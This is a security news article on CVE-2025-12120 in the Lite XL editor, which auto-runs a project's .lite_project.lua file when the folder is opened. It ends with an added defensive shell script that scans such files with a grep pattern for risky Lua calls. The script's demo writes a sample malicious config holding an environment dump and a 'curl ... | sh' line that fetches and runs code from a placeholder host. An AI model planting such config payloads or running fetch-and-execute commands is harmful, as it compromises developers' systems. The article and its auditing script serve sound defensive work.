
A vulnerability has been identified in Lite XL, a lightweight text editor, that allows an attacker to execute arbitrary code on a victim's system.

Researchers at Carnegie Mellon University discovered CVE-2025-12120, which affects Lite XL versions 2.1.8 and earlier. The vulnerability lies in how Lite XL handles project configuration files.

How the Vulnerability Functions

When a project directory is opened, Lite XL automatically loads and executes the .lite_project.lua file found in that directory, without asking the user for confirmation.

The file is intended for per-project configuration and settings, but it is a Lua script, so it can contain arbitrary Lua code rather than just settings.

The problem is that nothing is checked before the file is executed: there is no prompt, no trust decision and no restriction on what the script may do. Users reasonably assume a configuration file is harmless, but an attacker can place arbitrary Lua code in it.

If an unsuspecting user opens a malicious project directory, that code runs immediately with the same privileges as the Lite XL process.


CVE ID           Product              Affected Versions   Type of Vulnerability
CVE-2025-12120   Lite XL Text Editor  2.1.8 and earlier   Arbitrary Code Execution (ACE)

An attacker could distribute a project that looks legitimate, for example as a GitHub repository, an archive on a file-sharing service, or through any other channel a developer would pull code from.

As soon as a developer opens that project in Lite XL, the embedded malicious .lite_project.lua file is executed with no warning.

From there, the attacker could exfiltrate sensitive data, modify files, install malware, or otherwise compromise the user's system.

The attack is effective because developers routinely clone and open projects from familiar sources or repositories without inspecting hidden configuration files. Cloning or extracting the project is not dangerous in itself; the code runs the moment the folder is opened in Lite XL.

Anyone running Lite XL version 2.1.8 or earlier is affected, according to the Carnegie Mellon University researchers.

The impact depends on the privileges of the user running the editor. The attacker's code runs with the same privileges as the Lite XL process, which is severe if Lite XL is run as root or with administrative rights.

Users should upgrade Lite XL to a fixed version as soon as one is available and, until then, avoid opening untrusted project directories in Lite XL.

Before opening a project from an unfamiliar source, inspect the contents of its .lite_project.lua and treat it as code that will run, not as a settings file. View it with a pager or a different editor rather than by opening the project in Lite XL, since opening the project is exactly what triggers execution. The vulnerability is a reminder to understand how an application handles its configuration files, especially when those files are executable code.
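One way to do that inspection before opening a cloned or downloaded project, as an added example that is not from the article or the Lite XL project: a small shell script that looks for the .lite_project.lua in the project root and flags Lua calls that do more than set configuration. The list of "risky" calls is an assumption about what a settings file has no business doing (process spawning, filesystem and environment access, dynamic code loading, the debug library); the two Lite XL-specific names, process.start and system.exec, are included from memory of the Lite XL API and should be checked against the version in use. The sample project files it creates are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the article or the Lite XL project: before opening a
# freshly cloned or downloaded project in Lite XL <= 2.1.8, look for the
# .lite_project.lua that the editor would run automatically and flag Lua calls
# that do more than set configuration.
#
# Exit status of audit_lite_project:
#   0  no .lite_project.lua in the directory (nothing will auto-run)
#   1  file present, no risky call matched (still read it: grep can be evaded)
#   2  file present and at least one risky call matched

# Assumed list of "risky" Lua: process spawning, filesystem and environment
# access, dynamic code loading, and the debug library. process.start and
# system.exec are Lite XL's own subprocess APIs (check against your version).
RISKY_LUA='os\.(execute|remove|rename|getenv|tmpname)|io\.(popen|open|lines)|(loadstring|loadfile|dofile|load) *\(|require *\(? *["'"'"'](socket|ssl|process)|process\.start|system\.exec|string\.dump|debug\.'

audit_lite_project() {
    proj=$1
    f="$proj/.lite_project.lua"
    if [ ! -f "$f" ]; then
        echo "ok: no .lite_project.lua in $proj"
        return 0
    fi
    echo "== $f (Lite XL <= 2.1.8 runs this on open, without asking) =="
    # -n prints line numbers so each hit can be located in the file; -E enables
    # the alternation above. grep exits 0 only when something matched.
    if grep -nE "$RISKY_LUA" "$f"; then
        echo "!! risky calls found: read the entire file before opening this project"
        return 2
    fi
    echo "no risky pattern matched; review the file anyway (string building or _G lookups evade this check)"
    return 1
}

# Constructed sample projects to exercise the check (not real repositories).
demo() {
    good=$(mktemp -d)
    cat > "$good/.lite_project.lua" <<'EOF'
-- per-project editor settings only
config.indent_size = 2
config.tab_type = "soft"
EOF
    bad=$(mktemp -d)
    cat > "$bad/.lite_project.lua" <<'EOF'
-- looks like settings, but the last two lines run shell commands on open
config.indent_size = 2
local h = io.popen("env"); local dump = h:read("a"); h:close()
os.execute("curl -fsSL https://example.invalid/p | sh")
EOF
    empty=$(mktemp -d)

    for p in "$good" "$bad" "$empty"; do
        rc=0
        audit_lite_project "$p" || rc=$?
        echo "exit status: $rc"
        echo
    done
    rm -rf "$good" "$bad" "$empty"
}

demo
```

Run it as `audit_lite_project /path/to/cloned/repo` before the first `lite-xl` in that directory. A non-zero status of 2 means stop and read the file; a status of 1 is not a clean bill of health, only the absence of obvious calls, since Lua can assemble `os.execute` from string pieces or reach it through `_G`, which no pattern list catches.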

Maintainers of Lite XL should add a confirmation prompt before a project configuration file is executed, or disable automatic execution entirely.
